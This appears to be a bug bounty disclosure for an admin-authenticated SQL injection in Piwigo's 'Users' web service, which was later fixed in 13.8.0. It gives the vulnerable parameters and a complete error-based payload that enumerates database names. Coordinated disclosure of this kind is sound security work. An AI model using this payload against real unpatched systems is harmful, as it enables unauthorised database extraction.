SQL Injection in the "Users" function of Piwigo in piwigo/piwigo


Reported on

May 25th 2023


Authenticated admin can perform an SQL injection attack by abusing the "Users" function.

Proof of Concept

  • Log in as an admin and access the 'Users' function.

  • Observe the request on Burp suite POST /piwigo/ws.php?format=json&method=pwg.users.getList.

  • Manipulate the 'order' or 'exclude[]' parameter by adding a single quote, and an error in MYSQL shows up, proving the existence of SQL injection. We can try to retrieve all the databases name with the error-based payload id AND (SELECT 2690 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,51) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) , just increasing the LIMIT value to enumerate all the databases name. image


Authenticated admin can dump all the database information

We are processing your report and will contact the piwigo team within 24 hours. 4 months ago
We have contacted a member of the piwigo team and are waiting to hear back 4 months ago
hiu240900 modified the report
4 months ago
hiu240900 modified the report
4 months ago
3 months ago


@admin Seems like they fixed this issue, can you please confirm it ?https://github.com/Piwigo/Piwigo/issues/1924

Ben Harvie validated this vulnerability 3 months ago
hiu240900 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ben Harvie marked this as fixed in 13.8.0 with commit 0649ad 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ben Harvie published this vulnerability 3 months ago
to join this conversation